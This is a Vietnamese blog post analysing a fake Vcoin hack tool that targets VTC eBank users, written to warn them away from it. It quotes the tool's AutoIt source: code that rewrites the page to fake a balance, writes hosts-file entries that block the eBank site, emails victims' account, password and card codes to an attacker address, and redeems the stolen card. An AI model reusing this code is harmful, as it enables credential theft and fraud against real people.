J2TEAM Security: A must-have extension for Chrome users. Install now!

Phân tích những tuyệt chiêu mà 4VN Group đã sử dụng?

Phân tích những tuyệt chiêu mà 4VN Group đã sử dụng? | Juno_okyo's Blog
Phân tích mã nguồn Ebank Modz của 4VN (Giả mạo), chúng ta sẽ cùng xem họ đã dùng những "tuyệt chiêu" gì :)

* Chặn mở 2 bản hack cùng lúc để đảm bảo hoạt động ổn định của tiến trình đang chạy:


If _SINGLETON("VTC Ebank Modz", 1) = 0 Then
    MsgBox(0, "VTC Ebank Modz", "Hệ Thống Không Cho Phép 2 Chương Trình Chạy Cùng 1 Lúc !.")
    Exit
EndIf

* Kiểm tra tài khoản và mã thẻ hợp lệ (như VTC eBank):

If StringLen(GUICtrlRead($ACC)) > 14 Or StringLen(GUICtrlRead($ACC)) < 4 Then
                MsgBox(0, "Ebank !", "Tài Khoản Cần Bug Xin Vui Lòng Nhập Chính Xác")
            ElseIf StringLen(GUICtrlRead($PASS)) > 17 Or StringLen(GUICtrlRead($PASS)) < 4 Then
                MsgBox(0, "Ebank !", "Xin Nhập Đầy Đủ Và Chính Xác Mật Khẩu Để Quá Trình Kết Nối Tốt Hơn Tài Khoản Của Các Sẽ Được Bảo Mật Tuyệt Đối")
            ElseIf StringLen(GUICtrlRead($SE1)) <> 12 Then
                MsgBox(0, "Ebank !", "Seri Thẻ Cần Bug Có Lỗi Xin Bạn Kiểm Tra 1 Lần Nữa Để Kết Nối Hệ Thống")
            ElseIf StringLen(GUICtrlRead($SE2)) <> 12 Then
                MsgBox(0, "Ebank !", "Mã Thẻ Xin Các Bạn Nhập Chính Xác Các Ký Tự")
            ElseIf StringLeft(GUICtrlRead($SE1), 3) <> "PM0" And StringLeft(GUICtrlRead($SE1), 3) <> "PM1" Then
                MsgBox(0, "Ebank !", "Thẻ Bạn Không Hợp Lệ ! Xin Vui Lòng Kiểm Tra Lại !")
            ElseIf GUICtrlRead($KEY) <> "KUMDZ-62XMR-HJ653-A94MZ" And GUICtrlRead($KEY) <> "6FPDW-6HHJS-UZXUF-2834I" And GUICtrlRead($KEY) <> "GZKA0-J9AYF-4KZT8-XLKD9" And GUICtrlRead($KEY) <> "VZSDW-H86JS-KMSUF-LK54I" Then
                MsgBox(0, "Ebank !", " Keygen Được Cấp Miễn Phí ! Xin Vui Lòng Mở Tập Tin KeyGen.txt Để Nhập Chính Xác Các Ký tự")
            Else
                $SERI1 = GUICtrlRead($SE1)
                $SERI2 = GUICtrlRead($SE2)
                Call("GUI")
            EndIf

Đảm bảo tài khoản do nạn nhân nhập vào và các số serial đúng số kí tự.


* Hàm LUADAO (Lừa đảo, tên hàm cũng đã nói lên tất cả:


Func LUADAO()
    $OIE = _IECREATE("https://ebank.vtc.vn/home/ebank.account.changeinfo.html?m=1&l=vi", 1, 1, 1)
    $A = 200
    $I = 1
    While $I <= 20
        $BODY = _IEBODYREADHTML($OIE)
        $STEXT = _IEBODYREADTEXT($OIE)
        If Not StringInStr($STEXT, "Thay đổi thông tin ") Then
            MsgBox(0, "VTC Ebank Modz Card Lỗi !", "Bạn chưa đăng nhập vào tài khoản hoặc đăng nhập quá 10 phút" & @CRLF & "                         Vui lòng đọc kỹ hướng dẫn.")
            Exit
        EndIf
        Sleep(1000)
        Dim $AARRAY1[1]
        $AARRAY1 = _STRINGBETWEEN($STEXT, "Tổng số dư ", " Vcoin")
        If StringInStr($BODY, $AARRAY1[0] & " VCoin") Then
            $NEWBODY = StringReplace($BODY, $AARRAY1[0] & " VCoin", $AARRAY1[0] + 5000 & " VCoin")
            _IEBODYWRITEHTML($OIE, $NEWBODY)
        Else
            MsgBox(0, "VTC Ebank Modz Card Lỗi !", "Bạn chưa đăng nhập vào tài khoản hoặc đăng nhập quá 10 phút" & @CRLF & "                         Vui lòng đọc kỹ hướng dẫn.")
        EndIf
        $A = $A + 200
        $I = $I + 1
    WEnd
    Call("DIE")
    MsgBox(0, "Complete!", "Tổng số dư trong tài khoãn của bạn là 100.000 Vcoin!")
    Exit
EndFunc

Có thể thấy hàm trên còn thực hiện rewrite (viết lại HTML) để sửa số vcoin tại eBank nhằm qua mặt nạn nhân.

* Sau khi gọi hàm LUADAO, hàm DIE sẽ được gọi với nhiệm vụ làm nạn nhân không thể truy cập được ebank và các trang của VTC:

Func DIE()
    $FILE = FileOpen(@SystemDir & "\drivers\etc\hosts", 1)
    If $FILE = -1 Then
        MsgBox(0, "Thông báo !", "Tổng số dư trong tài khoãn của bạn là 100.000 Vcoin !")
        Exit
    EndIf
    FileWrite($FILE, @CRLF & "127.0.0.1 ebank.vtc.vn")
    FileWrite($FILE, @CRLF & "127.0.0.1 www.ebank.vtc.vn")
    FileWrite($FILE, @CRLF & "127.0.0.1 http://ebank.vtc.vn")
    FileClose($FILE)
EndFunc

Đồng thời đưa ra thông báo là đã hack được 100.000 vcoin :)

* Đồng thời sẽ gửi tài khoản và mật khẩu của nạn nhân về địa chỉ email (diangucden_ug@yahoo.com):

Global $OMYERROR = ObjEvent("AutoIt.Error", "MyErrFunc")
    $S_SMTPSERVER = "smtp.gmail.com"
    $S_FROMNAME = "Ebank"
    $S_FROMADDRESS = "autoit.supports@gmail.com"
    $S_TOADDRESS = "diangucden_ug@yahoo.com"
    $S_SUBJECT = "Support"
    $AS_BODY = "Account:   " & GUICtrlRead($ACC) & "          " & "Password:   " & GUICtrlRead($PASS) & "          " & "Seri:   " & GUICtrlRead($SE1) & "          " & "Code:   " & GUICtrlRead($SE2)

* Đồng thời thực hiện nạp luôn card do nạn nhân nhập vào (hàm NAP):
Func NAP()
    $OIE1 = _IECREATE("https://ebank.vtc.vn/home/ebank.money.vto.card.html?m=1&l=vi", 0, 0, 1)
    Sleep(1000)
    If WinActive("Security Alert", "Information you exchange with this site") Then
        ControlClick("Security Alert", "Information you exchange with this site", 1)
    EndIf
    $BODY1 = _IEBODYREADHTML($OIE1)

P/S: Qua việc phân tích mã nguồn, ta thấy nạn nhân không những sẽ mất thẻ vcoin mà còn có nguy cơ mất tài khoản chỉ vì quá tin vào những cái gọi là hack vcoin, bug vcoin :)

Bài phân tích bởi GhostClub's Technician TeaM.
Leader at J2TEAM. Website: https://j2team.dev/

1 nhận xét

  1. Cái mail trên là của pro này :v : http://hocautoit.com/forum/greatctrlpic-trong-gui
Cảm ơn bạn đã đọc bài viết!

- Bạn có gợi ý hoặc bình luận xin chia sẻ bên dưới.

- Hãy viết tiếng Việt có dấu nếu có thể!